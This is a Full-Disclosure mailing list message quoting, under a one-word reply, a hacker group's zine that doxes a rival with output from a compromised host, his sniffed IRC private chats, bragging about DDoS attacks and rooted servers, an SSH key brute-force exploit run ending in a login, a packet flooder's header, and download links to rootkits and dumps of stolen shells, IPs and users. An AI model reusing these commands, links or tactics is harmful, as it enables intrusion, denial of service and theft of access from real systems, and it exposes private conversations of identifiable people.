Scope:Global > inet6 addr: 2001:470:1f15:42b::6/64 Scope:Global > inet6 addr: 2001:470:1f15:42b::7/64 Scope:Global > inet6 addr: fe80::a00:2fe/64 Scope:Link > > > inet6 addr: fe80::a00:204/64 Scope:Link > inet6 addr: fe80::4d4e:54f2/64 Scope:Link > UP POINTOPOINT RUNNING NOARP MTU:1480 Metric:1 > RX packets:16700 errors:0 dropped:0 overruns:0 frame:0 > > > TX packets:9917 errors:0 dropped:0 overruns:0 carrier:0 > collisions:0 txqueuelen:0 > RX bytes:1677861 (1.6 MiB) TX bytes:982003 (958.9 KiB) > > tcp 0 0 77.48.84.242:65535 <http://77.48.84.242:65535> 189.4.189.139:61593 <http://189.4.189.139:61593> ESTABLISHED > > > tcp6 0 0 2001:470:1f15:42b:51338 2001:41e0:5::6667:6667 ESTABLISHED > tcp6 0 0 2001:470:1f15:42b:49197 2001:470:0:6667::2:6667 ESTABLISHED > tcp6 0 0 2001:470:1f15:42b:48159 2001:40a8:3000:1:0:6667 ESTABLISHED > > > tcp6 0 0 2001:470:1f15:42b:51411 2001:40a8:3000:1:0:6667 ESTABLISHED > > perl 12655 root 4u IPv4 3027913 TCP *:65535 (LISTEN) > root 12655 0.0 0.3 5256 3220 ? S Mar19 2:39 supervise log > > > - nice process name btw > - lets start the sniffer, shall we? - btw im using the ircsniff.pl you stole from efnet's box, thanks - > > <- :d0n_!burnout@...nout.bitchx.org <mailto:burnout@...nout.bitchx.org> PRIVMSG r47 :u know d0n > > > <- :d0n_!burnout@...nout.bitchx.org <mailto:burnout@...nout.bitchx.org> PRIVMSG r47 :he took my nick > <- :d0n_!burnout@...nout.bitchx.org <mailto:burnout@...nout.bitchx.org> PRIVMSG r47 :he's packeting me > > > <- :d0n_!burnout@...nout.bitchx.org <mailto:burnout@...nout.bitchx.org> PRIVMSG r47 :;\ > -> PRIVMSG d0n_ :d0n No such nick/channel > -> PRIVMSG d0n_ :d0n End of /WHOIS list. > -> PRIVMSG d0n_ :change > > > <- :d0n!burnout@...nout.bitchx.org <mailto:burnout@...nout.bitchx.org> PRIVMSG r47 :lamer :( > <- :d0n!burnout@...nout.bitchx.org <mailto:burnout@...nout.bitchx.org> PRIVMSG r47 :owns my dsl > > > <- :d0n!burnout@...nout.bitchx.org <mailto:burnout@...nout.bitchx.org> PRIVMSG r47 :real leet > -> PRIVMSG d0n :who ? > <- :d0n!burnout@...nout.bitchx.org <mailto:burnout@...nout.bitchx.org> PRIVMSG r47 :that d0n guy > > > <- :d0n!burnout@...nout.bitchx.org <mailto:burnout@...nout.bitchx.org> PRIVMSG r47 :had my nick > <- :d0n!burnout@...nout.bitchx.org <mailto:burnout@...nout.bitchx.org> PRIVMSG r47 :was talking shit > > > <- :d0n!burnout@...nout.bitchx.org <mailto:burnout@...nout.bitchx.org> PRIVMSG r47 :"here comes the ddos" he said > -> PRIVMSG d0n :fuck > -> PRIVMSG d0n :lets hack him > > -> PRIVMSG d0n :not hard target > > -> PRIVMSG d0n :hehehe > -> PRIVMSG d0n :to me > <- :d0n!burnout@...nout.bitchx.org <mailto:burnout@...nout.bitchx.org> PRIVMSG r47 :HHEHEHEEH\ > -> PRIVMSG d0n ::>:>:>:> > > -> PRIVMSG d0n :sup bitchx > > -> PRIVMSG d0n ::> > <- :d0n!burnout@...nout.bitchx.org <mailto:burnout@...nout.bitchx.org> PRIVMSG r47 ::) > -> PRIVMSG d0n :bitchx bugged > -> PRIVMSG d0n :do u use it ? > > <- :d0n!burnout@...nout.bitchx.org <mailto:burnout@...nout.bitchx.org> PRIVMSG r47 :the client? > > -> PRIVMSG d0n :yah > -> PRIVMSG d0n :0dayz > <- :d0n!burnout@...nout.bitchx.org <mailto:burnout@...nout.bitchx.org> PRIVMSG r47 :no shit.. > -> PRIVMSG d0n :eheh > > *********************** run to the hillz he h4s b1tchx 0d4y ********************** > > > > -> PRIVMSG d0n :i have windows on linux (vmware) ->>>>>>>>>>>>>>>>>>>>> lies > -> PRIVMSG d0n :hjmm > -> PRIVMSG d0n :;> > > > <- :d0n!burnout@...nout.bitchx.org <mailto:burnout@...nout.bitchx.org> PRIVMSG r47 :ah yeah > -> PRIVMSG d0n :omfg > <- :d0n!burnout@...nout.bitchx.org <mailto:burnout@...nout.bitchx.org> PRIVMSG r47 :any more fun with efnet soon? > > > -> PRIVMSG d0n :im still drunked > -> PRIVMSG d0n :no more > <- :d0n!burnout@...nout.bitchx.org <mailto:burnout@...nout.bitchx.org> PRIVMSG r47 :HEHE > -> PRIVMSG d0n :im stoped with x0x0x > > <- :d0n!burnout@...nout.bitchx.org <mailto:burnout@...nout.bitchx.org> PRIVMSG r47 :;p > > -> PRIVMSG d0n :just sniffing idiots now ->>>>>>>>>>>>>>>>>>>> so we are > > *********************** /laugh time ******************************************** > > > -> PRIVMSG accuser :nem > -> PRIVMSG accuser :nao me comunico mais com povo br ->>>>>>>>>>>>>>>>>>>> > -> PRIVMSG accuser :nao eh meu nivel > > > -> PRIVMSG accuser :so alguns amigos > -> PRIVMSG accuser :nego roubo meu canal ontem ->>>>>>>>>>>>>>>>>>>> some guyz stole my network baby > > > -> PRIVMSG accuser :recuperei > -> PRIVMSG accuser :e tomei o nick deles ->>>>>>>>>>>>>>>>>>>> i ddosed them and got their nicks > > > -> PRIVMSG accuser :/w psys > -> PRIVMSG accuser :/w dtr > -> PRIVMSG accuser :hehehe ->>>>>>>>>>>>>>>>>>>> now i feel gr8 > > > <- :accuser!~psy@...244.62.214 <mailto:psy@...244.62.214> PRIVMSG r47 :eu vi > <- :accuser!~psy@...244.62.214 <mailto:psy@...244.62.214> PRIVMSG r47 :o psys tacando monte de bot > > -> PRIVMSG accuser :comigo eh dificil um br poder ->>>>>>>>>>>>>>>>>>>> HAHAHAHAHAHAHAHAAHHAHAHAHAHAHAHAHA (12x) > > -> PRIVMSG accuser :hehehe > -> PRIVMSG accuser :eu mando! ->>>>>>>>>>>>>>>>>>>> im THE guy! > -> PRIVMSG accuser :eu to mo fora de guerra cara > > > -> PRIVMSG accuser :mas parece q os caras me perseguem > -> PRIVMSG accuser :e sismam q sou lamer ->>>>>>>>>>>>>>>>>>>> /me laughs > > > -> PRIVMSG accuser :rs > > -> PRIVMSG sexybaby :itsme q_+T*/81_3|Z3g; r47 ->>>>>>>>>>>>>>>>>>>> hiz botz, thanks for sharing > > > -> PRIVMSG sexybaby :op q_+T*/81_3|Z3g; > sexybaby on @#brasil @+#Sonya @#24/7 @+#prank @#unforgiven @#serious @#xanax ->>>>>>>>>>>>>>>>>>>> 3h3h3h3 > > > > <- :KoaL4!h@....75.56.186 <mailto:h@....75.56.186> PRIVMSG r47 :c vai me ajeita un trem que presta entum? ->>>>>>>>>>>>>>>>> gimm3 a b0x > > -> PRIVMSG KoaL4 :cara > > -> PRIVMSG KoaL4 :vou > -> PRIVMSG KoaL4 :mas nao me atrapalha > -> PRIVMSG KoaL4 :to aki programando > -> PRIVMSG KoaL4 :pra um cliente chato pra kct > > <- :\g4br13l\!~ucvn@...ver3.erz.univie.ac.at <mailto:ucvn@...ver3.erz.univie.ac.at> PRIVMSG r47 :ta > > > <- :\g4br13l\!~ucvn@...ver3.erz.univie.ac.at <mailto:ucvn@...ver3.erz.univie.ac.at> PRIVMSG r47 :arrumando truta > <- :\g4br13l\!~ucvn@...ver3.erz.univie.ac.at <mailto:ucvn@...ver3.erz.univie.ac.at> PRIVMSG r47 :com os cara da defland pq > > > <- :\g4br13l\!~ucvn@...ver3.erz.univie.ac.at <mailto:ucvn@...ver3.erz.univie.ac.at> PRIVMSG r47 :? > -> PRIVMSG \g4br13l\ :falaram meu nome em vao > -> PRIVMSG \g4br13l\ :nao qro isso > > -> PRIVMSG \g4br13l\ :so isso > > <- :\g4br13l\!~ucvn@...ver3.erz.univie.ac.at <mailto:ucvn@...ver3.erz.univie.ac.at> PRIVMSG r47 :r47 > <- :\g4br13l\!~ucvn@...ver3.erz.univie.ac.at <mailto:ucvn@...ver3.erz.univie.ac.at> PRIVMSG r47 :tu se esquenta > > > <- :\g4br13l\!~ucvn@...ver3.erz.univie.ac.at <mailto:ucvn@...ver3.erz.univie.ac.at> PRIVMSG r47 :com bobagem > -> PRIVMSG \g4br13l\ :hehee > <- :\g4br13l\!~ucvn@...ver3.erz.univie.ac.at <mailto:ucvn@...ver3.erz.univie.ac.at> PRIVMSG r47 :? > > > -> PRIVMSG \g4br13l\ :nao qro pivete > -> PRIVMSG \g4br13l\ :de merda > -> PRIVMSG \g4br13l\ :kiddie > -> PRIVMSG \g4br13l\ :falando de mim > -> PRIVMSG \g4br13l\ :pq qm manda ----->>>>>>>>>>>>> HAHAHAHAHAHAHAHAHAHAHAHA > > > -> PRIVMSG \g4br13l\ :sou eu ----->>>>>>>>>>>>> HAHAHAHAHAHAHAHAHAHAHAHA > -> PRIVMSG \g4br13l\ ::> > -> PRIVMSG \g4br13l\ :esse univie.ac.at <http://univie.ac.at> eh show > > > -> PRIVMSG \g4br13l\ :tenho a www la > -> PRIVMSG \g4br13l\ ::> > -> PRIVMSG \g4br13l\ :usam checkpoint firewall one ----->>>>>>>>>>>>> what the fuck ? > > > -> PRIVMSG \g4br13l\ :tunnelling by trace ----->>>>>>>>>>>>> ?!?1 > -> PRIVMSG \g4br13l\ :mto dificil pacota-la > > > *********************** boyfriends are fighting - portuguese only, sorry ********************** > > > -> PRIVMSG #thc :skotch is gay > -> PRIVMSG skotch :eai vagabunda > -> PRIVMSG skotch :vai fica na putaria ateh qdo > -> PRIVMSG skotch :to cheio de novidades > -> PRIVMSG skotch :e para de me chamar de verme > > > -> PRIVMSG skotch :rs > <- ::skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :vai toma no meu do teu cuh rapa, n qro papo contigo e ve se para de fica mandando alerta no meu nextel -> gtfo > > > -> PRIVMSG skotch :ahahaha > -> PRIVMSG skotch :vc tem certeza ->>>>>>>>> are you sure baby ? > -> PRIVMSG skotch :entao eh isso ? > -> PRIVMSG skotch :ja era ?: > > > -> PRIVMSG skotch :ja era ? > <- :skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :sim > -> PRIVMSG skotch :eu nao vou voltar aki denovo > > -> PRIVMSG skotch :pra falar com vc > > -> PRIVMSG skotch :ja era ? > -> PRIVMSG skotch :CERTEZA? ->>>>>>>> are you sure we are breaking apart????? > <- :skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :alias quem ta oltando aki direto eh vc, eu to na minha faz tempo > > > -> PRIVMSG skotch :to na minha tb > -> PRIVMSG skotch :so acho > <- :skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :vc fala merda e dps quer voltar a tras > > > <- :skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :coisa de mlk > -> PRIVMSG skotch :filho > -> PRIVMSG skotch :eu so acho > -> PRIVMSG skotch :q eh besteira > > > -> PRIVMSG skotch :agente brigasr por isso > -> PRIVMSG skotch :so isso > <- :skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :mermao n eh a primeira vez > > > <- :skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :q tu da dessas > <- :skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :vem falando bosta > > > :skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :e dps vem se desculpando > -> PRIVMSG skotch :so joguei um verde > <- :skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :n so esses verme de merda > > > <- :skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :q paga pau pra vc > -> PRIVMSG skotch :nao vou fazer isso denovo > <- :skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :q aceita tudo q vc fala > > > -> PRIVMSG skotch :whatever > -> PRIVMSG skotch :nao falei q tu paga sapo pra mim > -> PRIVMSG skotch :tu tb > -> PRIVMSG skotch :eh cheio das noia q nem eu > <- :skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :tu soh mostro q n confia > > > <- :skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :axando q eu passo maq pra xscholler > <- :skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :aff > > > -> PRIVMSG skotch :porra > -> PRIVMSG skotch :tu some > -> PRIVMSG skotch :so joguei um verde > -> PRIVMSG skotch :se nao confiasse > -> PRIVMSG skotch :tu nao tinha > -> PRIVMSG skotch :tds minhas box > > > -> PRIVMSG skotch :TODAS > -> PRIVMSG skotch :fdp > -> PRIVMSG skotch :outra coisa > -> PRIVMSG skotch :descobri > -> PRIVMSG skotch :o klux > -> PRIVMSG skotch :tem root na importec ->>>>>> klux has root in importec[their box] (you are right sir!) > > > -> PRIVMSG skotch :NAO USA MAIS ELA DE PONTE ->>>>>> dont use it as bounce anymore! (kinda late) > <- :skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :n vem dessas q qdo mandei o skotch.txt tinha mta maq la q vc nem tinha ownado, q eu tinha ownado sozinho > > > -> PRIVMSG skotch :e varias box.. ele so troca o ssh binario > -> PRIVMSG skotch :pra sniffa > <- :skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :n to usando mais importec faz tempo > > > -> PRIVMSG skotch :fica ligeiro > -> PRIVMSG skotch :eu formatei ele > -> PRIVMSG skotch :deproposito > -> PRIVMSG skotch :ele veio no meu pvt > -> PRIVMSG skotch :colo uma pa de merda > -> PRIVMSG skotch :ele sabe da ig > > > -> PRIVMSG skotch :da locaweb > -> PRIVMSG skotch :da pop > -> PRIVMSG skotch :<skotch> n vem dessas q qdo mandei o skotch.txt tinha mta maq la q vc nem tinha ownado, q eu tinha ownado sozinho > -> PRIVMSG skotch :e vice versa > > > -> PRIVMSG skotch :q seja > -> PRIVMSG skotch :ouytra coisa > -> PRIVMSG skotch :peguei coisa quente > -> PRIVMSG skotch :sshd > -> PRIVMSG skotch :hehehe > -> PRIVMSG skotch :remote expl > -> PRIVMSG skotch :openbsd local ->>>>>>>>>> y0y0 juz g0t a openbsd local (right, check it on milw0rm, asshole) > > > -> PRIVMSG skotch :tu fica de putaria > -> PRIVMSG skotch :agente perdendo tempo > <- :skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :o openbsd vc a mando faz tempo > > > -> PRIVMSG skotch :mas esse novo nao > -> PRIVMSG skotch :entra na merda do msn > -> PRIVMSG skotch :e para de putaria > -> PRIVMSG skotch :por besteira > -> PRIVMSG skotch :vou te desblokear ->>>>>>>>> i'll unblock ya from msn babe! plz come back ! > > > <- :skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :to indo pro trampo > -> PRIVMSG skotch :vai para com a putaria de merda ? > <- :skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :quem fica de putaria eh vc, falando bosta sem saber de nada > > > -> PRIVMSG skotch : * > -> PRIVMSG skotch : * eXstacy ~ # gcc sshexploit.c -o sshex -lssh > -> PRIVMSG skotch : * eXstacy ~ # ./sshex -h laggy.org <http://laggy.org> -l xxxxx -d keys/ ->>>>>>> w0w, this is certainly a 0day, right ? /me rolling on the floor laughing > > > -> PRIVMSG skotch : * [!] KEY FOUND! > -> PRIVMSG skotch : * [!] Logging in... > -> PRIVMSG skotch : * Last login: Fri Aug 15 16:05:43 2008 from xxxxxxxxxxxxxxxxx > -> PRIVMSG skotch : * xxxxx@...italjunk ~ $ > > > -> PRIVMSG skotch : * > -> PRIVMSG skotch : * Not that practical since it doesnt use threads, but the code shows > -> PRIVMSG skotch : * howto make a ssh client from scratch using libssh for what purpose > > <- :skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :procura se informar primeiro antes de falar merda > > -> PRIVMSG skotch :so joguei verde > -> PRIVMSG skotch :sou noiado > -> PRIVMSG skotch :vc tb he > -> PRIVMSG skotch :normal > <- :skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :esse ai eh um bruteforce q usa um bug do ssh > > > -> PRIVMSG skotch :nao fiz mal nenhum pra vc > <- :skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :pode demorar horas pra achar a key certa > > -> PRIVMSG skotch :nao > > -> PRIVMSG skotch :de 5 a 10 min > -> PRIVMSG skotch :o coideloko ja ta melhorando ele > -> PRIVMSG skotch :pra demorar menos > -> PRIVMSG skotch :hehe > -> PRIVMSG skotch :a oi ta bugada > -> PRIVMSG skotch :ele FUNCIONA > > > -> PRIVMSG skotch :e jaja > -> PRIVMSG skotch :to com 0day pra samba > -> PRIVMSG skotch :aguarde > <- :skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :so falo > > > <- :skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :pra vc fica esperto > <- :skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :q tem gringo > > > <- :skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :te sniffando > <- :skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :pq fikei sabendo > > > -> PRIVMSG skotch :ta loko ? > -> PRIVMSG skotch :so se for na bnc > -> PRIVMSG skotch :hehehe > <- :skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :nego q ta falando com vc > > > -> PRIVMSG skotch :ateh entao nao ligo > <- :skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :soh pra causar intriga > -> PRIVMSG skotch :porra > > -> PRIVMSG skotch :tu eh meu amigo ou nao eh :? > > -> PRIVMSG skotch :<skotch> so falo > -> PRIVMSG skotch :<skotch> pra vc fica esperto > -> PRIVMSG skotch :<skotch> q tem gringo > -> PRIVMSG skotch :<skotch> te sniffando > -> PRIVMSG skotch :<skotch> pq fikei sabendo > > > -> PRIVMSG skotch :qm sniffando ? > -> PRIVMSG skotch :skotch > -> PRIVMSG skotch :fala krl > -> PRIVMSG skotch :skotch > -> PRIVMSG skotch :skotch > <- :skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :to comend mermao > > > <- :skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :e to atrasado pro trampo > <- :skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :flw > > > -> PRIVMSG skotch :cara > -> PRIVMSG skotch :se tu continuar folgado > -> PRIVMSG skotch :naovaidar > -> PRIVMSG skotch :vai sew fude > -> PRIVMSG skotch :fala direito > <- :skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :isso eh facil de vc descobrir, so vc ver quem se aproximo de vc > > > <- :skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :ultimamente > <- :skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :e n trocava ideia antes > > > <- :skotch!~skotch@...t.bl4m3.4.l33tzor.org <mailto:skotch@...t.bl4m3.4.l33tzor.org> PRIVMSG r47 :so vc pensar > -> PRIVMSG skotch :whatever > -> PRIVMSG skotch :vc > -> PRIVMSG skotch :e o thomaz > > > -> PRIVMSG skotch :sao os unicos > -> PRIVMSG skotch :q tem as m erda q tenho > -> PRIVMSG skotch :UNICOS > -> PRIVMSG skotch :mais ngm tem > -> PRIVMSG skotch :nao confio em m ais NGM > -> PRIVMSG skotch :eu acho q tu deveria me falar qm eh > > > -> PRIVMSG skotch :so isso > -> PRIVMSG skotch :e troquei de bnc ontemrs > -> PRIVMSG skotch :e troquei de bnc ontem rs ->>>>>> i changed my bnc yesterday! (we're glad) > > > -> PRIVMSG rip :skotch said to me that are sniffing me > -> PRIVMSG rip :but skotch dont know about nothing ->>>>>> as always, backstabbing hiZ boyfriend(skotch) > > > /* > > > * Geminid IIb. TCP/UDP/ICMP Packet flooder > * > * What can i say? Enjoy! :) > * gr33tz: PoWerPr0 and godmode0 > * > > thanks for the gem source by the way! > > >>> there could be more logs, but some kool guyz cant stop ddosing r47, so this is kind of boring to do > > > >> anyway, if we get something else in the future, we will publish again. thanks buddies. > > random logs if you have nothing to do: http://labsec.elite.vc/r47-1.log http://labsec.elite.vc/r47-2.log > > > > ########################################################################## > # __ __ __ __ # > #.----.| |--.---.-.-----.| |_.-----.----. | |_| |--.----.-----.-----.# > > > #| __|| | _ | _ || _| -__| _| | _| | _| -__| -__|# > #|____||__|__|___._| __||____|_____|__| |____|__|__|__| |_____|_____|# > # |__| # > > > # # > # - download links # > ########################################################################## > > > > <><> thiZ iZ ZeRIouZ buZInEzZ dewD! > <><> http://labsec.elite.vc/x0x0x-suckY-sshd.tar.bz2 > <><> http://labsec.elite.vc/x0x0x-suckY-phalanx-suckit.tar.bz2 > > > <><> http://labsec.elite.vc/x0x0x-suckY-shells-ips-users-allinone.tar.bz2 [we are not sharing all of them, just some random ones] > > > > <><> please guyZ, make it priv8 ! (/me rolleyes :B) > > - kool&klean chapter. > > ########################################################################## > # _ _ ___ # > > > # ___ | |_ ___ ___ _| |_ ___ _ _ | | '___ _ _ _ _ # > # / | '| . |<_> || . \ | | / ._>| '_> | |-/ . \| | || '_> # > # \_|_.|_|_|<___|| _/ |_| \___.|_| |_| \___/`___||_| # > > > # |_| # > # # > # - conclusion # > > > ########################################################################## > > > ----------------- reflection time > >.......... whats the point of all this ? prove that you are better than someone ? > >......... what a joke. just coz you are lucky and had the chance it doesnt mean you are bl4ckh47. > > > >........ your zines are pathetic. what the fuck is this 'messages' shit in the bottom of them ? > >....... like you are able to hack someone by yourself, eh ? you cant do shit x0x0x, you ARE shit. > >...... why thank soldiers and all blackhats? you dont belong to any of them, none of them like you. > > > >..... why would someone send you a mail? nobody cares about you, dipshit. > >.... i cant really believe that you spent time creating a new mail just koz of your second shit zine, hahahahaha what a joke > >... stop playing hacker, you are not hacker, - we are not hackers -, you cant even do shellscript, get a life while you can. > > > >.. a kiss to zmda > >. think twice before you fuck with us, asshole. we know you, we know what you can do, and we know what you cant do. > > just to finish: > > ******************************** m355 w17h 7h3 beZt - diE liKE th3 r3s7 ******************************** > > > ; > ; > ; _____ __ _______ > ;| |_.---.-.| |--.| __|.-----.----. > ;| | _ || _ ||__ || -__| __| > ;|_______|___._||_____||_______||_____|____| > ; > > > ; _______ __ __ __ > ;|_ _|.-----.--| |.--.--.-----.| |_.----.|__|.-----.-----. > ; _| |_ | | _ || | |__ --|| _| _|| || -__|__ --| > ;|_______||__|__|_____||_____|_____||____|__| |__||_____|_____| > > > ; ; > ; > ; #LABSEC @ EFNET - closed to friends, of course. > ; > ; klux/djow - include - input - r3n4t0 - memelo - deadcow - w3b - kernel` - kylebond - fseek > > > ; > ; lAmE ZiNE wRitTeN bY: > ; > ; klux - spoof1 @RR0B@ gmail.com <http://gmail.com> - hAppY flOodiNg > ; > ; > ; wE iZ watCHiNg U > ******************************** m355 w17h 7h3 beZt - diE liKE th3 r3s7 ******************************** > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > > > ---------------------------------------------------------------------- > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ Lame... _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists